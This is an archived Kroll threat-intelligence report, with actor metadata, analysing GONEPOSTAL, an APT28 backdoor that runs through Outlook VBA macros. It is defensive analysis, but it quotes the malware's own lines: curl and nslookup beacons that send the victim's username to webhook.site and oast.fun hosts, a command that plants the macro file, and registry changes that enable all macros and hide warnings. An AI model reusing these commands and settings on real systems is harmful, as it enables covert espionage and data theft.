{ "id": "d02cb389-02db-47fa-b773-3cdf03d5bd95", "created_at": "2026-04-06T02:11:59.288808Z", "updated_at": "2026-04-10T03:37:50.274808Z", "deleted_at": null, "sha1_hash": "b4fdffe847ff946ff299b3aad4ed91d799040113", "title": "FANCY BEAR GONEPOSTAL – Espionage Tool Provides Backdoor Access to Microsoft Outlook", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 10153037, "plain_text": "FANCY BEAR GONEPOSTAL – Espionage Tool Provides\r\nBackdoor Access to Microsoft Outlook\r\nPublished: 2025-09-05 · Archived: 2026-04-06 01:37:07 UTC\r\nThis article has been authored by Marc Messer, Dave Truman.\r\n \r\nKey Takeaways \r\nKroll has observed GONEPOSTAL malware used in an espionage campaign attributed to KTA007 (Fancy\r\nBear, APT28).\r\nThe malware consists of a dropper DLL and an obfuscated, password protected VbaProject.OTM file,\r\nwhich houses macros written for Microsoft Outlook.\r\nThe malicious macros add backdoor functionality to Outlook, enabling email communication for\r\nCommand and Control (C2).\r\nKTA007, also known as Fancy Bear, APT28, and Pawn Storm, is a state sponsored political and economic\r\nespionage group associated with the Russian Military’s Main Intelligence Directorate (GRU) Unit 26165. The\r\ngroup has been implicated in several high-profile cyberattacks such as the 2016 Democratic National Committee\r\nbreach, the International Olympic Committee, the Norwegian Parliament and others. They are known to utilize\r\ntechniques and tools ranging from zero-day exploitation, spear phishing and a mixture of commercial and custom\r\nmalware.\r\nFollowing the initial report of an intrusion, files provided to Kroll analysts included two Dynamic Link Library\r\n(DLL) files, which tend to contain code, resources or data which can be used by multiple programs. These files\r\ninclude: \r\nSSPICLI.dll\r\nThe SSPICLI.dll is an unsigned malicious DLL pretending to be Microsoft’s legitimate signed DLL of the same\r\nname that supplies security support provider interfaces for tasks such as authentication. The legitimate DLL was\r\nsupplied alongside, with a new name of tmp7EC9.dll.\r\nhttps://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook\r\nPage 1 of 20\n\nFigure 1 - Malicious and legitimate DLL code signature checks (Source: Kroll).\r\nThe malicious DLL uses its export table to forward all 105 exported library functions of the legitimate DLL to the\r\nrenamed DLL supplied alongside, allowing any application using the malicious DLL to appear to work normally.\r\nFigure 2 - Functions forwarded from malicious DLL to renamed legitimate DLL\r\nThe malicious code of the DLL exists as two key C++ functions executed from the DLLMain execution path. The\r\nfirst function is the DLLMain function itself.\r\nThe DLLMain function starts by defining several C++ strings that contain the parameters to execute an encoded\r\nPowerShell command.\r\nhttps://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook\r\nPage 2 of 20\n\nFigure 3 – MainDLL creating PowerShell command lines and passing them to execution function (Source: Kroll)\r\nThese parameters are passed to the second key function whose purpose is to spawn PowerShell to run those\r\ncommands.\r\nThe execute PowerShell function converts the C++ string parameter to a C++ wstring (wide string) and then\r\nprepends “powershell” to the beginning of the wstring, creating a full PowerShell command line which then\r\npasses to the “CreateProcessW” Windows API function executing the command. Of note here is the\r\ndwCreationFlags value of 0x8000000, which stops the creation of an application window.\r\nhttps://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook\r\nPage 3 of 20\n\nFigure 4 – PowerShell command execution function (Source: Kroll)\r\nThe four commands being run are broken down into two sets of functionalities, the first command copies a file\r\nnamed “testtemp.ini” into the Outlook profile directory, one stage of enabling the actors macros to run on Outlook\r\nstartup.\r\n$a=$env:APPDATA;copy testtemp.ini \"$a\\Microsoft\\Outlook\\VbaProject.OTM\"\r\nThe other three commands appear to be redundant mechanisms to allow the attacker to obtain the username, and\r\nsometimes the IP address of successfully compromised victims. Once the actor has the username they can work\r\nout the email address to send the C2 emails too.\r\nnslookup \"$env:USERNAME.8bf50371-5f9f-4d45-9320-922b068ebc2e.dnshook.site\"\r\ncmd /c curl \"https[:]//webhook[.]site/8bf50371-5f9f-4d45-9320-922b068ebc2e?$env:USERNAME\" -k\r\nnslookup \"$env:USERNAME.wcyjpnuxotpaebuijrtn3urwx1zeg223v.oast.fun\"\r\nThe first two requests utilize a free service designed for web application developers and testers and provide two\r\nmethods of logging the details via a standard HTTP request with the username as a query parameter this method\r\nhttps://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook\r\nPage 4 of 20\n\nalso gives the actor the IP address of the victim, and via a DNS request where the users name is added as the\r\nhostname component of the full qualified domain name (FQDN). The second method provides a useful backup\r\nshould the HTTP request be blocked by an organization’s security tools such as reputation-based proxies.\r\nFigure 5 –Example of control panel for webhook.site showing tracking information (Source: Kroll) \r\nThe final DNS request which also features the USERNAME in the hostname component of the FQDN, is using a\r\ndomain associated with tracking for pen testing tools, particularly used for vulnerability scanners to prove that an\r\nexploit worked when the relevant DNS lookup is made. \r\nOnce the four commands have completed, control then returns to the DLLMain function. \r\nThe second half of the DLLMain function centers around the setting windows registry values.\r\nhttps://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook\r\nPage 5 of 20\n\nFigure 6 – Windows registry modifications in DLLMain (Source: Kroll) \r\nThe code sets three windows registry values, LoadMacroProviderOn, Level, and PONT_STRING. \r\n \r\nLoadMacroProviderOn \r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\LoadMacroProviderOnBoot = 1 \r\nThis registry setting enables loading of macro providers on Outlook application start. \r\nLevel\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Security\\level = 1 \r\nThis setting allows all macros and corresponds to the “enable all macros” option of “macro settings”.\r\nhttps://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook\r\nPage 6 of 20\n\nFigure 7 – Corresponding option to “Level” registry key (Source: Kroll) \r\nPONT_STRING \r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Options\\General\\PONT_STRING = \"32,\" \r\nThis registry key is a comma separated list of dialog boxes which are suppressed and not shown, i.e. this key\r\nkeeps track of dialog boxes which the users ticked “do not show this message again” type options. \r\nThe value of 32 maps to the dialog box that would normally warn the user of content being downloaded. By\r\nsetting this value the malware has stopped this dialog box being shown to the user.\r\nhttps://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook\r\nPage 7 of 20\n\nFigure 8 – Corresponding option to setting “32,” in “PONT” registry key (Source: Kroll) \r\n \r\nVbaProject.OTM \r\nVbaProject.OTM contains VBA macros which are executed by Microsoft Outlook, constituting a backdoor which\r\nKroll analysts have titled GONEPOSTAL. The VbaProject.OTM file at first glance is password protected. While\r\nthis does not fully encrypt the code in a typical manner, it does result in many products requiring a password to\r\nview the file upon opening. This can be bypassed in many cases using a hex or text editor, however, the logic of\r\nthe file remains difficult to evaluate as many strings and symbols are scrambled:\r\nhttps://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook\r\nPage 8 of 20\n\nFigure 9 – Initialization function, unedited (Source: Kroll) \r\nHowever, since symbols and variable names are reused throughout the code, observing execution and surrounding\r\nlogic allows for the macro file to be reconstructed to a format which is more easily parsed by humans.\r\nFigure 10 – Initialization function, edited (Source: Kroll) \r\nConfiguration detail strings are base64, however, interpreted from an offset. In a simple sense, this means that\r\nreverting the base64 payloads requires removing the first few characters to reach that offset, with the remaining\r\ncharacters cleaning reverting to plaintext.  \r\nGONEPOSTAL is loaded into Microsoft Outlook via enabling of the registry setting\r\n“LoadMacroProviderOnBoot”, which enables the automatic loading of VBA from the VbaProject.OTM file. This\r\nresults in a backdoor utilizing the email service itself as a C2 channel.  \r\nAt a high level, here is how the Outlook macro backdoor behaves: \r\nStartup\r\nhttps://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook\r\nPage 9 of 20\n\nApplication_MAPILogonComplete() triggers on Outlook startup. \r\nInit() is called to decode configuration strings, set up directories and prepare payloads. \r\nEmail Monitoring\r\nApplication_NewMailEx() listens for new emails.\r\nEach email is passed to HandleMailItem().\r\nCommand Detection and Parsing \r\nHandleMailItem() checks for known command signatures.\r\nIf found, ProcessMailPayload() decodes and stores the payload.\r\nCommand Execution \r\nFinalizeMailItem() dispatches commands via DispatchPayloadCommand(): \r\ncmd -\u003e ExecuteShellCommand() -\u003e captures output -\u003e WriteByteChunksToFiles() \r\ncmdNo -\u003e TryExecuteCommand() (no output)\r\nupload -\u003e HandleUploadCommand() -\u003e writes file to disk\r\ndownload -\u003e HandleDownloadCommand() -\u003e reads file, chunks it \r\nExfiltration \r\nExecutePayload() creates and sends an Outlook email to the attacker.\r\nEncodes data in the body and attaches files.\r\nCleanup\r\nDeleteMailAndMatchInDeleted() removes processed emails from the inbox and deleted items.\r\nStartup begins at MAPI login; which is when Outlook has access to the messaging application programming\r\ninterface. Init() then beings to parse string details such as the C2 email, some C2 command types and command\r\narrays, and filetypes are decoded from their initial configuration.\r\nhttps://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook\r\nPage 10 of 20\n\nFigure 11 – Initialized command keywords (Source: Kroll)\r\n \r\nhttps://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook\r\nPage 11 of 20\n\nhttps://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook\r\nPage 12 of 20\n\nFigure 12 – Initialized file extensions (Source: Kroll)\r\nFollowing this, Application_NewMailEx() waits for new emails. When new emails arrive, they are added to a\r\ndictionary list of mail items and parsed by HandleMailItem(). Essentially, as emails arrive, they are added to a\r\nqueue; and within this queue they are sub-sorted to establish if they contain C2 instructions.\r\nhttps://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook\r\nPage 13 of 20\n\nFigure 13 – Mail listening function (Source: Kroll)\r\nMail items are handled by skipping any non-delivery reports (NDR,) any replies (Re,) and then checking for any\r\ncommands within the mail item. Based on this, emails are either removed from the queue, or C2 emails are\r\nidentified, commands processed and then the emails are deleted from both the inbox and the deleted folder.\r\nhttps://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook\r\nPage 14 of 20\n\nProcessMailPayload() then extracts encoded data from the C2 and creates task items with them, returning the\r\ncommand results. The encoding is still base 64 with a defined offset, similar to our configuration encoding in the\r\nInit() function.\r\nFigure 14 – C2 payload decoding (Source: Kroll) \r\nFurther error handling and string encoding/decoding takes place, and emails continue to be tabulated within their\r\ndictionary list. This takes place as a mixture of their generated Email ID numbers, the recipient address, the\r\nsubject and the decoded string of any C2 commands. Should errors occur, they are appended to the dictionary as\r\nwell.\r\nhttps://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook\r\nPage 15 of 20\n\nFigure 15 – Dictionary queue of mail to be handled (Source: Kroll)\r\nCommand execution has yet to occur, which is handled in a FinalizeMailItem() function. This iterates through the\r\ndictionary of mail items, passes the commands off to a dispatch function for execution and returns the results of\r\ntheir payloads.\r\nFigure 16 – Further mail handling (Source: Kroll) \r\nThe DispatchPayloadCommand() function is quite short and simple, utilizing our four major command types from\r\nearlier in the Init() function. Anything else is rejected, and the outcome logged to the dictionary.\r\nhttps://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook\r\nPage 16 of 20\n\nFigure 17 – Command dispatch (Source: Kroll) \r\nThe commands fall into two categories: file operations and command execution. The file operations are largely\r\nrelated to file chunking and either reconstructing a file from chunks or breaking a file down into chunks. This is so\r\nthat small files can be sent or received via the C2 as attachments; though these attachments would have to be\r\nrelatively small since they will be sent as emails. The functions do not actually upload or download anything\r\nthemselves, as that is to be handled by the sending of emails. They can be summarized as a group: \r\nWriteByteChunksToFiles: Splits a byte array into chunks and writes them to disk. \r\nWriteBytesToFile: Writes a byte array to a file.\r\nSliceByteArray: Extracts a portion of a byte array. \r\nCheckChunkFilesExist: Checks if chunk files already exist.\r\nGenerateUniqueFileMetadata: Generates a unique file name and extension. \r\nCreateFileMetadata: Combines base name and extension to form a file name. \r\nReencodeFileContent: Reads, encodes and rewrites a file with a header. \r\nResolveFilePath: Expands environment variables and resolves relative paths. \r\nFile transfer operations take place in the following method. Firstly, files for egress are read and converted to\r\nbase64, with the original file deleted.\r\nhttps://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook\r\nPage 17 of 20\n\nFigure 18 – File encoding operations (Source: Kroll) \r\nFollowing this operation, files are split into byte chunks for transfer. This uses the same buffer setting seen earlier\r\nduring the Init() function, 3145728 bytes; approximately 3.15 megabytes. These byte chunks are then written to\r\nfiles for transfer via email.\r\nFigure 19 – Byte chunk operations (Source: Kroll)\r\nFor saving attachments from emails for file ingress, the same process is used in reverse. Files are saved, and then\r\nreverted from chunks to a larger file, and then converted from base64 into their original format.\r\nCommand execution is simpler, a powershell session is created and any commands sent are executed.\r\nThis can occur in two different ways: \r\ncmd -\u003e ExecuteShellCommand() -\u003e captures output -\u003e WriteByteChunksToFiles() \r\ncmdNo -\u003e TryExecuteCommand() (no output) \r\nhttps://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook\r\nPage 18 of 20\n\nWhile very similar, the first option (cmd) executes commands, saves the output and writes that output to a file for\r\nreturn to C2. The second option (cmdNo) just executes any commands passed to it and does not save nor return\r\nany output.\r\nFigure 20 – PowerShell command execution (Source: Kroll) \r\nAdditional code samples within the sample were also uncovered, however, they do not all appear to be fully used.\r\nThis may indicate that the backdoor continues to be under development, with additional features to be added.\r\nThe campaign is a good example of living-off-the-land, using common business tools and methods of\r\ncommunication for command and control. Interception of email communications and a platform for tool ingress\r\nover legitimate means enables a stealthy manner of access which could be difficult to detect. While Outlook based\r\npersistence is not new, and has been observed before from KTA488 (aka APT32,), GONEPOSTAL is not a\r\ncommonly seen tactic; and many may not have alerts tuned regarding behavior of the VbaProject.OTM files nor\r\nthe registry edits which enable the macros to be loaded from the OTM file at Outlook launch.\r\nhttps://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook\r\nPage 19 of 20\n\nFigure 21 – Flowchart of execution (Source: Kroll) \r\n \r\nGet in touch with Kroll’s CTI Team for further frontline information and explore how our team can help you stay\r\nahead of today’s threats.\r\nSource: https://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook\r\nhttps://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.kroll.com/en/publications/cyber/fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook" ], "report_names": [ "fancy-bear-gonepostal-espionage-tool-backdoor-access-microsoft-outlook" ], "threat_actors": [ { "id": "af509bbb-8d18-4903-a9bd-9e94099c6b30", "created_at": "2023-01-06T13:46:38.585525Z", "updated_at": "2026-04-10T02:00:03.030833Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "OceanLotus", "ATK17", "G0050", "APT-C-00", "APT-32", "Canvas Cyclone", "SeaLotus", "Ocean Buffalo", "OceanLotus Group", "Cobalt Kitty", "Sea Lotus", "APT 32", "POND LOACH", "TIN WOODLAWN", "Ocean Lotus" ], "source_name": "MISPGALAXY:APT32", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "870f6f62-84f5-48ca-a18e-cf2902cd6924", "created_at": "2022-10-25T15:50:23.303818Z", "updated_at": "2026-04-10T02:00:05.301184Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "APT32", "SeaLotus", "OceanLotus", "APT-C-00", "Canvas Cyclone" ], "source_name": "MITRE:APT32", "tools": [ "Mimikatz", "ipconfig", "Kerrdown", "Cobalt Strike", "SOUNDBITE", "OSX_OCEANLOTUS.D", "KOMPROGO", "netsh", "RotaJakiro", "PHOREAL", "Arp", "Denis", "Goopy" ], "source_id": "MITRE", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5da6b5fd-1955-412a-81aa-069fb50b6e31", "created_at": "2025-08-07T02:03:25.116085Z", "updated_at": "2026-04-10T02:00:03.668978Z", "deleted_at": null, "main_name": "TIN WOODLAWN", "aliases": [ "APT32 ", "Cobalt Kitty", "OceanLotus", "WOODLAWN " ], "source_name": "Secureworks:TIN WOODLAWN", "tools": [ "Cobalt Strike", "Denis", "Goopy", "JEShell", "KerrDown", "Mimikatz", "Ratsnif", "Remy", "Rizzo", "RolandRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775441519, "ts_updated_at": 1775792270, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b4fdffe847ff946ff299b3aad4ed91d799040113.pdf", "text": "https://archive.orkl.eu/b4fdffe847ff946ff299b3aad4ed91d799040113.txt", "img": "https://archive.orkl.eu/b4fdffe847ff946ff299b3aad4ed91d799040113.jpg" } }